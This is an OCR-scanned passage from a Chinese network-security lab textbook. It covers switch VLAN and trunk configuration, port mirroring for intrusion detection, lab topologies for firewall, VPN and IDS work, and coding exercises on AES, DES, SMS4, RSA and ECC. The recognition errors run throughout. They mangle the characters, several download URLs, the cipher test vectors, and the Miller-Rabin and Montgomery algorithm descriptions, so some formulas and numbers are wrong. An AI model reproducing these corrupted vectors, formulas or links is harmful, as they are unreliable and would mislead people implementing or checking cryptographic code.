这 样 配置 结束 后 ， 在 HostA 上 ping 172.30.0.120 255.255.0.0， 可 以 观察 到 有 数据 回 
复 。 同 样 ， 在 HostB 上 ping 172.30.0.123 255.255.0.0， 也 可 以 观察 到 有 数据 回复 。 而 在 
HostC 上 分 别 ping 172.30.0.120 255.255.0.0 和 ping 172.30.0.123 255.255.0.0 时 , 都 没有 数 
据 回 复 。 也 就 是 HostA 和 HostB 之 间 可 以 相互 通信 , 而 HostC 与 HostA，HostC 与 HostB 
之 间 不 能 相互 通信 。 

【实验 报告 】 

(1) 写 出 详细 的 配置 过 程 。 

(2) 将 HostB 和 HostC 配置 在 VLAN 3 中 ， 实 验 三 台 主 机 之 间 的 通信 状况 ， 并 做 详 
细 记 录 。 


【思考 题 】 
一 个 小 型 公司 的 局 域 网 内 共有 50 台 PC， 分 为 管理 部 (10 台 PC) 、 研 发 部 (20 台 
PC) 和 销售 部 (20 台 PC) 三 个 部 门 。 请 规划 它们 相应 的 卫 地 址 ， 从 而 能 够 实现 各 部 门 
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之 间 的 相互 隔离 。 如 果 用 VLAN 方式 ， 如 何 设置 交换 机 ? 
2.2.3 ” 跨 交 换 机 VLAN 划分 
【实验 目的 】 


本 实验 的 主要 目的 是 掌握 VLAN 的 基本 配置 。 在 完成 VLAN 的 相关 配置 之 后 , 要求 


E 够 达到 同一 VLAN 内 的 PC 可 以 互通 ， 而 不 同 VLAN 间 的 PC 不 能 互通 的 目的 。 
【原理 简介 】 
VLAN 可 以 跨越 不 同 的 交换 机 ， 使 在 同一 个 VLAN 的 PC 相互 通信 。 
【实验 环境 】 


j 台 S3000 系列 交换 机 ，4 台 PC。 先 按照 图 2-20 连接 各 实验 设备 ， 然 后 配置 HostA 


IP 地 址 为 10.1.1.2/24, HostB IP 地 址 为 10.1.2.2/24, HostC 1]P 地 址 为 10.1.1.3/24, HostD IP 
地 址 为 10.1.2.3/24， 如 图 2-20 所 示 。 


SwitchA Eo/l EQ0/1 SwitchB 


HostA HostB HostC HostD 
VLAN2 VLAN3 VLAN2 VLAN3 


图 2-20 实验 拓扑 


【实验 步骤 】 

具体 的 配置 如 下 。 

(1) 配置 交换 机 端口 属于 特定 VLAN。 

[Quidway] sysname SwitchA // 更 改 系 统 名 
[SwitchAl]vlan 2 // 创 建 并 进入 VLAN 2 配置 模式 


[SwitchA -vlan2]port ethernet0/9 to ethernet0/16 

// 将 端口 9 一 16 加 入 VLAN 2 
[SwitchA -vlan2]vlan 3 // 创 建 并 进入 VLAN 3 配置 模式 
[SwitchA -vlan3]port ethernet0/17 to ethernet0/24 


// 将 端口 17 一 24 加 入 VLAN 3 
SwitchB 的 配置 与 上 面相 似 。 


[Quidway]sysname SwitchB 
[SwitchB]vlan 2 


[SwitchB -vlan2]port ethernet0/9 to ethernet0/16 
[SwitchB-vlan2]vlan 3 


[SwitchB -vlan3]port ethernet0/17 to ethernet0/24 
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(2) 配置 交换 机 之 间 的 端口 为 Trunk 端口 ， 并 且 允 许 所 有 VLAN 通过 。 


[SwitchA]interface ethernet0/1 // 进 入 端口 1 视图 
[SwitchA-Ethernet0/1]portlink-typetrunk 
// 设 置 端口 工作 在 Trunk 模式 (系统 默认 为 Access 模式 ) 
[SwitchR -Ethernet0/1l]port trunk permit vlan all 
// 人 允许 所 有 VLAN 通过 Trunk 端口 


下 面 设置 类 同 : 
[SwitchB]interface ethernet 0/1 // 进 入 端口 1 视图 
[SwitchB-Ethernet0/1]port link-type trunk // 设 置 端口 连接 类 型 


[SwitchB-Ethernet0/1]pPort trunk permit vlan all // 人 允许 所 有 VLAN 通过 


配置 完成 后 , 可 以 看 到 , 同一 VLAN 内 部 的 PC 可 以 互相 访问 , 不 同 VLAN 间 的 PC 
不 能 够 互相 访问 。 | 

(3) 在 原 有 拓扑 结构 的 基础 上 ， 添 加 一 台 2 
交换 机 SwitchC 如 图 2-21 所 示 。 要 求 达到 上 述 
同样 的 目的 : 相同 VLAN 间 可 以 通信 ， 不 同 
VLAN 间 不 能 通信 。 请 特别 注意 ， 两 台 主 机 要 
想 ping 通 , 必须 要 将 主机 的 IP 地 址 设置 在 同一 
个 网 段 中 ， 和 否则 ， 即 使 在 相同 的 VLAN 中 主机 
也 是 ping 不 通 的 。 

(4) 继续 上 面 的 实验 ， 此 时 需要 修改 


- HostA HostB HostC HostD 
SwitchC 交换 机 E0/1 和 E0/2 接口 的 配置 。 配置 “”vLAN2 VIAN3 VIAN2 VIAN3 


步骤 如 下 。 图 2-21 实验 拓扑 
配置 三 台 交 换 机 之 间 的 链 路 为 Trunk 链 路 : 


[Quidway] sysname SwitchC 


[SwitchC]interface ethernet0/1 // 进 入 端口 1 视图 
[SwitchC-Ethernet0/1]port link-type trunk // 设 置 端口 连接 类 型 
[SwitchC-Ethernet0/1]port trunk permit vlan all // 人 允许 所 有 VLAN 通过 
[SwitchC-Ethernet0/1]interface ethernet0/2 // 进 入 端口 2 视图 
[SwitchC-Ethernet0/2]port link-type trunk // 设 置 端口 连接 类 型 


[SwitchC-Ethernet0/2]port trunk permit vlan all // 人 允许 所 有 VLAN 通过 


完成 上 述 配 置 之 后 , 可 以 测试 一 下 各 VLAN 之 间 的 主机 是 否 可 以 ping 通 。 结果 是 否 
定 的 ， 这 是 因为 交换 机 SwitchC 没有 配置 VLAN 2 和 VLAN 3， 所 以 来 自 VLAN 2 和 
VLAN 3 的 帧 不 能 通过 。 必 须 在 交换 机 上 创建 VLAN 2 和 VLAN 3, 这 样 , 这 两 个 VLAN 
的 帧 才能 够 通过 SwitchC 。 

(5) 在 SwitchC 上 创建 VLAN 2 和 VLAN 3。 


[SwitchC]vlan 2 
[SwitchC]vlan 3 
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这 样 就 基本 完成 了 实验 。 理 解 比较 透彻 的 读者 ， 可 以 自行 设计 VLAN 并 观察 
结果 。 


【实验 报告 】 
(1) 写 出 配置 过 程 。 
(2) 使 用 display 命令 ， 观 察 VLAN 的 分 配 情况 。 


【思考 题 】 
(1) 用 流程 图 描述 出 你 所 理解 的 三 层 交 换 技术 的 软件 实现 ， 并 与 老师 交流 。 
(2) 在 局 域 网 中 ， 你 是 如 何 识别 VLAN 的 ? 通常 划分 VLAN 有 哪儿 种 方法 ? 


2.2.4 ”端口 镜像 配置 


【实验 目的 】 

本 实验 的 主要 目的 是 掌握 交换 机 端口 的 镜像 配置 。 在 完成 镜像 配置 后 ， 镜 像 端口 能 
够 捕获 所 有 通过 该 交换 机 的 数据 包 。 这 种 镜像 端口 的 配置 方法 非常 有 用 ， 例 如 ， 当 内 部 
网 络 欲 采用 基于 网 络 的 入 侵 检 测 系统 (NIDS) 监听 所 有 进出 内 部 网 络 的 数据 流 时 ， 应 当 
将 交换 机 的 所 有 端口 镜像 到 NIDS 的 探测 器 端口 上 。 


【原理 简介 】 

交换 机 (Switch) 是 一 种 基于 MAC (网 卡 的 硬件 地 址 ) 识别 ， 能 完成 封装 转发 数据 
包 功 能 的 网 络 设备 。 交 换 机 可 以 “学 习 ”MAC 地 址 ， 并 把 其 存放 在 内 部 地 址 表 中 ， 通 过 
在 数据 帧 的 始 发 者 和 目标 接收 者 之 间 建 立 临 时 的 交换 路 径 ， 使 数据 帧 直接 由 源 地 址 到 达 
目的 地 址 。 

集线器 (Hub ) 是 计算 机 网 络 中 连接 多 个 计算 机 或 其 他 设备 的 连接 设备 ， 是 对 网 络 
进行 集中 管理 的 最 小 单元 。Hub 是 一 个 共享 设备 ， 主 要 提供 信号 放大 和 中 转 的 功能 ， 
它 把 一 个 端口 接收 的 所 有 信号 向 所 有 端口 分 发 出 去 。 一 些 集线器 在 分 发 之 前 将 弱 信 号 
加 强 后 重新 发 出 ， 还 有 一 些 集线器 则 排列 信号 的 时 序 以 提供 所 有 端口 间 的 同步 数据 
通信 。 

Switch 和 Hub 是 有 区 别 的 ， 比 如 一 个 100Mb/s 的 Switch， 每 一 个 连接 在 Switch 上 
的 计算 机 的 速度 都 是 100Mb/s， 而 Hub 是 瓜分 100Mb/s 的 资源 。 而且 Hub 是 通过 广播 来 
通信 ， 占 用 很 多 网 络 资源 。 

对 于 NIDS 而 言 , 需要 获取 整个 网 络 的 数据 , 而 根据 前 面 曾 述 的 交换 机 的 特点 , 将 
NIDS 直接 插 在 交换 机 的 某 个 端口 上 是 获取 不 到 整个 网 络 数据 的 , 所 以 必须 通过 设置 交 
换 机 的 镜像 端口 ， 使 所 有 端口 的 数据 在 发 送 到 目的 端口 的 同时 ， 复 制 一 份 送 给 镜像 
端口 。 

【实验 环境 】 

一 台 华 为 S2026 交换 机 ， 一 台 入 侵 检测 设备 ， 若 干 连 接 到 交换 机 上 的 PC， 实 验 网 络 
拓扑 如 图 2-22 所 示 。 
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图 2-22 实验 拓扑 图 


【实验 步骤 】 

华为 S2008/S2016/S2026/S2403H/S3026 等 交换 机 都 支持 基于 端口 的 镜像 ， 有 以 下 两 
种 方法 。 

方法 一 : 

(1) 配置 镜像 (观测) 端口 。 


[SwitchA]monitor-port e0/23 // 将 端口 23 设 为 镜像 口 


(2) 配置 被 镜像 端口 。 


[SwitchA]port mirror ethernet0/1 to Ethernet0/22 


// 将 端口 1~ 端 口 22 作为 镜像 数据 来 源 
方法 二 : 可 以 一 次 性 定义 镜像 和 被 镜像 端口 


[SwitchA]port mirror ethernet0/1 to ethernet0/22 observing-port ethernet0/23 
// 将 端口 1~ 端 口 22 数据 镜像 到 23 端口 


【实验 报告 】 

请 观察 并 比较 端口 被 镜像 前 后 ， 插 在 该 端口 上 的 NIDS 所 获取 的 网 络 数据 有 何 
【思考 题 】 

如 果 分 别 使 用 交换 机 和 集线器 ， 对 于 局 域 网 内 的 数据 嗅 探 有 什么 影响 ? 


23 防火墙 


硬件 防火 墙 实验 所 采用 的 网 络 结构 如 图 2-23 所 示 。 
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219.224.161.145 


192.168.3.11~192.168.3.20 


图 2-23 “硬件 防火 墙 实验 所 采用 的 网 络 拓扑 结构 图 


24 VPN 


网 络 到 网 络 模式 VPN 实验 的 网 络 拓扑 结构 如 图 2-24 所 示 。 


Internet 


219.224.161.147 219.224.161.146 219.224.161.145 


me 2 i 3 


网 络 1: 172.16.1.0/24 网 络 2: 172.16.2.0/24 网 络 3: 172.16.3.0/24 
图 2-24 网 络 到 网 络 模式 VPN 实验 网 络 拓扑 结构 
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_ 25 _IDS 


入 侵 检测 系统 IDS 实验 的 网 络 拓扑 结构 如 图 2-25 所 示 。 


IDS eth0: 192.168.1.110 


PC 


ethl: 192.168.1.111 192.168.1.13 


192.168.1.0/24 
图 2-25 IDS 实验 网 络 拓 扑 结构 
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第 3 章 
对 称 密码 算法 


3.1 _AES 


【实验 目的 】 
通过 对 AES 算法 的 C 源 程 序 代码 进行 修改 ,了 解 和 掌握 分 组 密码 体制 的 运行 原理 和 
编程 思想 。 


【原理 简介 】 

AES 是 1997 年 1 月 由 美国 国家 标准 和 技术 研究 所 (NIST) 发 布 公告 征集 的 新 一 代 
数据 加 密 标准 ， 以 替代 DES 加 密 算法 。 其 基本 功能 为 对 称 分 组 密码 ， 分 组 长 度 为 128b， 
密 钥 长 度 支 持 128b、192b、256b。 在 最 终 的 评估 中 ， 人 和 凭借 各 种 平台 实现 性 能 的 高 效 性 ， 
Vincent Rijnmen 和 Joan Daemen 提出 的 Rijndael 算法 胜出 ， 被 确定 为 AES。 

有 关 算 法 的 详细 介绍 请 参阅 相关 参考 书 。 


【实验 环境 】 
操作 系统 是 Windows、Linux 甚至 DOS 的 PC。 安装 有 一 种 C 语言 编译 环境 即 可 。 
【实验 步骤 】 


本 实验 使 用 的 是 Rijndael 的 作者 在 《高 级 加 密 标准 (AES ) 算法 一 一 Rijndael 的 设计 》 
(中 文 版 已 由 清华 大 学 出 版 社 发 行 ) 附录 中 给 出 的 参考 代码 。 该 代码 演示 了 在 明文 和 密 钥 
均 为 全 0 时 ， 不同 分 组 、 不 同 密 钥 长 度 下 进行 AES 加 解密 的 结果 。 本 实验 也 可 从 
https://github.com/libtom/libtomcerypt/blob/master/src/ciphers/aes/aes.c 下 载 AES 的 实现 源码 。 

请 读者 分 析 代 码 , 找 出 各 个 部 分 是 由 哪个 函数 实现 的 , 并 了 解 函 数 实现 的 具体 过 程 。 

选取 密 钥 长 度 和 分 组 长 度 均 为 128b， 试 修改 上 述 代 码 ， 完 成 以 下 实验 。 

(1) 全 0 密 钥 扩展 验证 : 对 于 128b 全 零 密 钥 ， 请 利用 KeyExpansion 函数 将 密 钥 扩 
展 的 结果 填 入 表 3-1 中 。 


表 3-1 各 轮 的 扩展 密 钥 


00000000000000000000000000000000 
62636363626363636263636362636363 


第 0 轮 
第 1 轮 
第 2 轮 
第 3 轮 
第 4 轮 
第 9 轮 
第 10 轮 
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(2) 修改 程序 ， 在 表 3-2 中 填写 第 1 轮 、 第 2 轮 的 中 间 步 骤 测 试 向 量 。 


LEGEND 
Input: 
Start: 
S_box: 
S_row: 
M col: 
K_sch: 


Output: 


-round r = 0 to 10 

cipher input 

state at the start of round[r] 

state after s box substitution 

state after shift row transformation 
state after mix column transformation 
key achedule value for round[r] 
cipher output 


PLAINTEXT: 3243F6A8885A308D313198A2E0370734 


KEY: 


2B7E151628AED2A6ABF7158809CF4F3C 


ENCRYPT: 16 byte block, 16 byte key 


表 3-2 第 1、 第 2 轮 的 中 间 步 骤 测 试 向 量 


R[00].input 3243F6A8885A308D313198A2E0370734 
R[00].k_sch 2B7E151628AED2A6ABF7158809CF4F3C 


R[01] start 


193DE3BEAOF4E22B9AC68D2AE9F84808 


R[01].s_box 
R[01].s_row 
R[01].m_col 
R[01].k_sch 


R[02].start 


R[02].s_box 
R[02].s_row 
R[02].m_col 
R[02].k_sch 


(3) 修改 该 程序 ， 使 其 可 在 〈128，128) 模式 下 进行 文件 的 加 解密 ， 并 对 某 文档 进 
行 加 解密 ， 观 察 解 密 后 与 原文 是 否 相 同 。 如 有 不 同 ， 试 考虑 如 何 解决 。 再 用 该 程序 加 密 
流 媒 体 文 件 ， 观 察 解密 后 是 否 能 够 正确 完整 播放 。 

(4) 计算 加 解密 的 效率 ， 并 进行 一 定 的 优化 使 加 密 效 率 提高 。 


【实验 报告 】 


(1) 简 述 AES 算法 每 个 输入 分 组 的 长 度 及 格式 。 
(2) 简 述 AES 算法 每 轮 加 密 过 程 的 4 个 步骤 。 
(3) 填写 上 面 的 表格 。 


【思考 题 】 


计算 加 解密 的 效率 ， 并 进行 一 定 的 优化 使 加 密 效率 提高 。 


3.2 _DES 


【实验 目的 】 
通过 对 DES 算法 的 代码 编写 , 了 解 分 组 密码 算法 的 设计 思想 和 分 组 密码 算法 的 工作 模式 。 


【原理 简介 】 

DES 是 Data Encryption Standard (数据 加 密 标准 ) 的 缩写 。 它 是 由 IBM 公司 研制 的 
一 种 加 密 算法 ， 美 国 国家 标准 局 于 1977 年 公布 把 它 作 为 非 机 要 部 门 使 用 的 数据 加 密 标 
准 ， 三 十 多 年 来 ， 它 一 直 活跃 在 国际 保密 通信 的 舞台 上 ， 扮 演 了 十 分 重要 的 角色 。DES 
是 一 个 分 组 加 密 算法 , 分 组 长 度 为 64b， 密 钥 长 度 也 为 64b, 但 因为 含有 8 个 奇偶 校 验 比 
特 ， 所 以 实际 密 钥 长 度 为 56b。DES 算法 是 迄今 为 止 使 用 最 为 广泛 的 加 密 算法 ， 由 于 计 
算 能 力 的 发 展 , DES 算法 的 密 钥 长 度 已 经 显得 不 够 安全 了 , 所 以 目前 DES 的 常见 应 用 方 
式 是 DES_ EDE2， 即 三 重 DES， 采 用 加 密 一 解密 一 加 密 三 重 操作 完成 加 密 ， 其 中 加 密 操 
作 采 用 同一 密 钥 ， 解 密 操作 采用 另 一 密 铀 ， 有 效 密 钥 长 度 为 112b。 

有 关 算 法 的 详细 介绍 请 参阅 相关 参考 书 。 


【实验 环境 】 
安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 VC 6.0 以 上 版 本 的 编译 器 。 


【实验 步骤 】 

(1) 请 读者 从 http://eryptopp.sourceforge.net/docs/ref521/des_8cpp-source.html 上 下 载 
DES 实现 的 源码 ， 并 以 112b 全 0 密 钥 加 密 数 据 任 任 仔 企 仓 企 在 企 ， 验 证 加 密 结果 是 否 为 
35 55 50 b2 15 0e 24 51。 

(2) 测试 加 密 速度 和 程序 代码 长 度 。 

(3) 使 用 CBC 方式 加 密 一 段 64B 自选 数据 ， 改 变 初始 向 量 值 ， 比 较 加 密 结果 。 


【实验 报告 】 

(1) DES_ EDE2 算法 程序 实现 框图 、 使 用 说 明和 源 程序 清单 。 
(2) 算法 加 密 速 度 测试 结果 。 

(3) CBC 方式 加 密 运 行 结果 ， 并 说 明 CBC 加 密 方式 的 特点 。 


【思考 题 】 
(1) 从 加 密 速 度 和 代码 长 度 比 较 DES_EDE2 和 AES 的 算法 效率 。 
(2) 为 什么 要 使 用 DES_EDE?2 而 不 使 用 密 钥 不 同 的 两 重 DES? 
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【实验 目的 】 
通过 对 SMS4 算法 的 代码 编写 ， 了 解 分 组 密码 算法 的 设计 思想 和 工作 原理 。 
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【原理 简介 】 
SMS4 是 一 种 由 国家 商用 密码 管理 办 公 室 发 布 应 用 于 无 线 局 域 网 产品 中 的 加 密 算 
法 。 该 算法 是 一 个 分 组 加 密 算法 。 该 算法 的 分 组 长 度 为 128b， 密 钥 长 度 为 128b。 加 密 算 


法 与 密 钥 扩 
轮 密 钥 的 使 


展 算法 都 采用 32 轮 非 线 性 迭代 结构 。 解 密 算法 与 加 密 算法 的 结构 相同 ,只 是 
用 顺序 相反 ， 解 密 轮 密 钥 是 加 密 轮 密 钥 的 逆序 。 


【实验 环境 】 

安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 VC++ 6.0 及 以 上 版 本 的 编译 器 。 

【实验 步骤 】 

(1) 从 http://read.pudn.com/downloads76/sourcecode/crypt/287055/sms4/sms4.cpp_.html 
参考 编写 SMS4 算法 ， 并 以 密 钥 : 01 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 10 加 密 数 据 


01 23 45 67 


89 ab cd ef fe dc ba 98 76 54 32 10， 验 证 加 密 结 果 是 否 为 68 le df 34 d2 06 96 


Se 86 b3 e9 4f 53 6e 42 46。 

(2) 利用 相同 加 密 密 钥 对 一 组 明文 反复 加 密 1 000 000 次 , 密 钥 为 : 01 23 45 67 89 ab 
cd ef fe dc ba 98 76 54 32 10， 加 密 数 据 为 01 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 10， 
验证 测试 结果 是 否 为 59 52 98 c7 c6 fd 27 1f04 02 f8 04 c3 3d 3f 66。 

(3) 计算 加 解密 的 效率 ， 并 进行 一 定 的 优化 使 加 密 效率 提高 。 


【实验 报告 】 
(1) 简 述 SMS4 加 密 算 法 密 钥 生 成 的 步骤 及 加 解密 过 程 。 
(2) SMS4 加 密 算法 实现 框图 和 源 程序 清单 。 


【思考 题 】 

(1) 分 析 SMS4 在 密码 结构 上 与 DES、AES 有 何 异 同 。 

(2) 根据 SMS4 算法 ， 编 程 研究 SMS4 的 S 盒 的 以 下 特性 。 

@ 明文 输入 改变 一 位 ， 密 文 输出 平均 改变 多 少 位 ? 

@ Ss 盒 输入 改变 一 位 ，$S 盒 输出 平均 改变 多 少 位 ? 

@ 工 输入 改变 一 位 ，L 输出 平均 改变 多 少 位 ? 

@ 对 于 一 个 输入 ， 连 续 施 加 S 盒 变 换 ， 变 换 多 少 次 时 出 现 输 出 等 于 输入 ? 
(3) 我 国 公 布 商 用 密码 算法 有 何 意义 ? 
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第 4 章 


4.1 RSA 


【实验 目的 】 
掌握 RSA 算法 的 基本 原理 及 素数 判定 中 的 Rabin-Miller 测试 原理 、Montgomery 快 
速 模 乘 算法 ， 了 解 公 钥 加 密 体制 的 优 缺 点 以 及 它 的 应 用 方式 。 


【原理 简介 】 

1978 年 发 明 的 RSA 算法 是 第 一 个 既 能 用 于 数据 加 密 也 能 用 于 数字 签名 的 算法 。 它 
易于 理解 和 操作 , 是 最 为 流行 的 公 钥 加 密 算法 之 一 。 算法 以 发 明 者 的 名 字 命 名 : R.Rivest、 
A.Shamir 和 L.Adleman。RSA 算法 是 基于 大 整数 分 解 这 个 数论 难题 的 基础 上 的 ， 目 前 尚 
未 证 明 破解 RSA 体制 等 价 于 大 整数 因 式 分 解 , 也 许 人 们 以 后 可 以 找到 其 他 破解 方法 从 而 
使 RSA 算法 失效 。RSA 算法 的 另 一 缺陷 是 其 运算 速度 要 远 慢 于 对 称 密码 体制 ， 这 大 大 
限制 了 它 的 使 用 范围 。RSA 很 少 直接 用 于 加 密 海量 数据 或 是 通信 信息 ， 而 是 将 其 用 在 数 
字 签 名 、 密 钥 分 配 和 数字 信封 等 领域 。RSA 算法 的 关键 运算 是 大 数 的 模 指数 运算 ， 最 常 
用 的 实现 方法 是 采用 Montgomery 模 乘 算法 来 实现 模 指 数 运 算 。 


【实验 环境 】 
安装 Windows 操作 系统 的 PC 一 台 ， 其 上 安装 VC++ 6.0 及 以 上 版 本 的 编译 器 。 
【实验 步骤 】 


1. RSA 算法 实现 

读者 可 从 http://eryptopp.sourceforge.net/docs/ref521/rsa_8cpp-source.html 得 到 一 个 
C++ 的 RSA 源 程序 ， 该 源 程序 已 经 包含 较 多 的 注释 ， 希 望 读 者 能 够 借助 这 些 注 释 读 懂 这 
个 程序 。 在 读 程序 的 过 程 中 , 要 对 Rabin-Miller 素性 检验 和 Montgomery 模 乘 有 一 个 明确 
的 了 解 。 

1) Miller-Rabin 检测 法 

Miller-Rabin 检测 法 基于 Gary Miller 的 部 分 想法 ， 由 Michael Rabin 发 展 。 该 检测 法 
描述 如 下 :首先 选择 一 个 待 测 的 随机 数 mw， 计算 0，2 是 能 够 整除 n-1 的 2 的 最 大 守 数 。 
然后 计算 m， 使 得 n= 25m+1。 

@ 随机 选取 aE(1,，n)。 

@ 设 j=0, 计算 z=a”modn。 

@ 车 z=1 或 者 z==n-1， 则 nn 通过 测试 ， 可 能 是 素数 。 


@ 如 果 j>0 且 z=1， 则 nn 不 是 素数 。 

@@ 令 j=j+t1l。 车 j<b 且 z#n-1, 令 z=zzmodn， 然 后 回 到 第 @ 步 。 

若 z=n-1， 则 nn 通过 测试 ， 可 能 是 素数 。 

@ 车 j=b 且 zz#n-1， 则 nn 不 是 素数 。 

对 a 选取 个 不 同 的 随机 值 ， 重 复 k 次 这 样 的 测试 。 如 果 n 都 能 通过 测试 ， 则 可 断 
定 n 不 是 素数 的 概率 不 超过 4。 

2) Montgomery 算法 描述 

选择 与 n 互 素 的 基数 R， 为 计算 方便 ， 它 通常 是 机 器 字 长 的 倍数 ， 并 且 选 择 R7 及 
1， 满 足 0<R "<n，0<n'<R， 使 得 RR -nn =1。 对 0 三 T<RXn 的 任意 整数 7， 
Montgomery 给 出 求 取 模 乘法 TR modn 的 快速 算法 M(7): 


Function M(T) 
A=(T mod R) n' mod R; 0<A<R 
t= (T+An) /R 
if tn then return (t-—n) 
else return t 


从 上 面 的 MD 运算 可 以 看 出 , 因为 4n= Tnn'=-TmodR, 故 1 为 整数 ; 因 1R= Tmod 
n， 得 1= TR-1modn。 由 于 0T+ hn<Rn+Rn，M(7T) 的 运算 结果 范围 是 0< 1<2n。 

由 于 整数 以 R 的 剩余 系 形式 参加 计算 ， 所 以 Montgomery 算法 会 带 来 一 定 的 附加 计 
算 。 在 计算 z= ab mod n( 其 中 a,b <R) 之 前 ， 预 先 求 出 4=aRmodn 和 B=bRmodn， 青 
求 Z=Md,B)=4BR- mod n=(aR)(bR) R71mod n=(abR) mod n， 最 后 的 计算 结果 也 要 
做 相应 调整 = MD =ZR-'mod n=ab RR mod n=ab mod n。 可 见 这 种 方法 适合 于 像 
RSA 这 样 有 多 次 取 模 乘法 的 取 模 寡 乘 运算 。 对 于 整数 e 和 任意 整数 m， 加 密 或 解密 信息 
m 即 是 求解 me mod n。 对 输入 变换 得 到 M= mR mod 2 之 后 ， 取 模 寡 乘 的 乘法 平方 循环 
用 Montgomery 乘法 来 完成 ， 最 后 调整 得 到 最 终 的 加 密 或 解密 信息 。 把 e 描述 成 e=el(n) - 
lel(n)-2，…，ele0， 其 中 1(n) 表 示 e 的 位 数 。 取 模 徊 乘 运 算 过 程 可 描述 为 : 


M: =mR mod n; 

2:=1R mod n; 

for i in 1(n)-1 downto 0 loop 
2:=Mn(2,2); 
if ei=]1 then 

2: =Mn(2,M); 

end if; 

end loop; 


z=2R™! mod n; 
2. 混合 加 密实 验 
借助 于 第 二 个 源 程序 ， 可 以 进行 一 次 采用 DES 算法 和 RSA 算法 的 混合 加 密 应 用 的 
实验 。 请 准备 一 个 较 大 的 影音 文件 用 于 加 解密 测试 〈 几 十 兆 字 节 、 几 百 兆 字 节 为 佳 ) 。 
程序 界面 如 图 4-1 所 示 。 
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yptest - Microsoft Visual C++ - [rsa.cpp] 

加 文件 上 E) 编辑 {E) 查看 (Y) 插入 (1) 工程 (p) 姐 建 (B) 工具 (T) 窗口 (W) 帮助 (H) 
| 简 | 咏 加 时 | 曲阜 | 之 - 达 * | 喇 | 夯 车 | 色 | 

[Gebas lA giobal membere 7|[RSA Testnstantiaton 


#include “rsa-h 


#include “asn.h" 


让 Sowce files 晤 Hinclude “oids.h" 

国 3way.cpp 国 Hinclude “nodarith.h" 
dhoc.cpp.prot Winclude “nbtheory.h" 

adler32.cpp #include “sha-h” 

因 algebra.cpp Winclude “algparan.h" 

国 algparam.cpp Hinclude “fips148.h" 

arc4.cpp 

国 asn.cpp 

国 authenc.cpp 

base32.cpp 


Hif tdefined(NDEBUG) && tdefined(CRYPTOPP_IS_DLL) 
#include “pssr.h” 

NAMESPACE_BEGIN(CryptoPP) 

void RSR_TestInstantiations() 

国 base64.cpp { 一 


记 RSRSS<PKCS1u15，SHh>::Uerifier x1(1, 1); 
RSASSCPKCS1u15, SHA>::Signer x2(NullRNG(), 1); 


Cl... | 加 Re.….| 国 Fil... Tt 


eryptopp-dll - @ error(s), 9 warning(s) 


4 组 建 (调试 和 天 文件 :中 本 乱入 下 文件 ?中 本 和 入 结果 SQL Debugging 7 加 吧 1 了 
就 绪 [大 5 到 17 REC [cot 


图 4-1 加 密 测试 程序 界面 


编译 运行 该 C++ 程序 后 ， 可 以 进入 文件 加 密 界 面 ， 如 图 4-2 所 示 。 


199889 


图 4-2 文件 加 密 程序 界面 


因为 还 未 获得 密 钥 ， 所 以 单 击 【 产 生 RSA 密 钥 对 】 按 钮 进入 产生 密 钥 对 界面 ， 如 
图 4-3 所 示 。 

在 这 个 界面 下 可 以 产生 100 位 的 大 素数 P、O (产生 方法 依然 是 Rabin-Miller 检验 ) ， 
N 值 ， 公 钥 e 和 私 钥 d。 注意， 导出 这 些 值 为 文件 ， 便 于 加 密 时 调用 。 

然后 ， 关 闭 这 个 界面 ， 在 加 密 界 面 中 选择 需要 加 密 的 文件 、RSA 的 参数 、 对 称 加 密 
的 方式 (DES/3DES)， 开始 加 密 运 算 , 注意 加 密 完 成 后 的 加 密 时 间 、 加 密 后 的 文件 大 小 ， 
填 入 实验 报告 中 。 
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图 4-3 产生 密 钥 对 界面 
将 加 密 好 的 文件 放 入 输入 文件 中 ， 将 密 钥 改 成 私 钥 就 可 以 进行 公 钥 解 密 了 。 同 样 记 
录 解 密 的 时 间 和 文件 大 小 。 特 别 注 意 : 解密 后 的 文件 是 否 能 够 正常 播放 ? 

【实验 报告 】 
(1) 简 述 RSA 算法 密 钥 生成 的 步骤 及 加 解密 过 程 。 
(2) 简 述 加 密 数据 量 对 RSA 加 密 速度 的 影响 。 
【思考 题 】 
(1) 对 称 密码 体制 与 非 对 称 密码 体制 各 有 什么 优 缺 点 ? 
(2) 这 些 优 缺点 是 如 何 影响 它们 的 应 用 的 ? 


4.2 _ECC 


【实验 目的 】 

- 解 libecc 开发 包 提 供 的 各 个 库 函 数 的 用 法 ， 并 利用 这 些 库 函 数 实现 基于 椭圆 曲 线 
的 Diffie-Hellman 密 钥 交换 和 椭圆 曲线 加 密 (Elliptic Curves Cryptography，ECC) 。 
【原理 简介 】 
第 六 届 国 际 密码 学 会 议 对 应 用 于 公 钥 密码 系统 的 加 密 算法 推荐 了 两 种 ， 基 于 大 整数 
因子 分 解 问题 (IFP) 的 RSA 算法 和 基于 椭圆 曲线 上 离散 对 数 计算 问题 (ECDLP) 的 ECC 
算法 。4.1 节 中 涉及 的 RSA 算法 的 特点 之 一 是 数学 原理 简单 、 在 工程 应 用 中 比较 易于 实 
现 , 但 它 的 单 :强度 相对 较 低 ; 相 比 之 下 ，ECC 算法 的 数学 理论 非常 深奥 和 复杂 ， 
在 工程 应 用 中 比较 难于 实现 ， 但 它 的 单位 安全 强度 相对 较 高 ， 也 就 是 说 ， 要 达到 同样 的 
安全 强度 ，ECC 算法 所 需 的 密 钥 长 度 远 比 RSA 算法 低 。RSA 的 当前 密 钥 大 小 推荐 值 为 
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2048b, 而 小 得 多 的 224b 的 ECC 密 钥 即 可 提供 相同 级 别 的 安全 性 ; 而 随 着 安全 级 别 的 提 
高 ， 这 种 优势 会 变 得 越发 明显 ， 例 如 ，256b 的 ECC 密 钥 与 3072b 的 RSA 密 钥 功效 完全 
相同 。 这 就 有 效 地 解决 了 为 了 提高 安全 强度 必须 增加 密 钥 长 度 所 带 来 的 工程 实现 难度 的 
问题 ， 且 设备 需要 的 存储 空间 、 功 耗 、 内 存 和 带宽 也 都 较 少 ， 这 使 得 开发 者 可 以 在 诸如 
无 线 设备 、 手 持 计 算 机 、 智 能 卡 和 瘦 客户 端 等 限定 的 平台 中 实施 加 密 技 术 。 目前 ,NIST、 
ANSI 和 IEEE 都 已 对 ECC 进行 了 标准 化 ，ECC 加 密 算 法 有 着 广泛 的 应 用 前 景 。 

关于 ECC 基本 原理 及 数学 基础 的 介绍 ， 请 参阅 相关 参考 书 。 

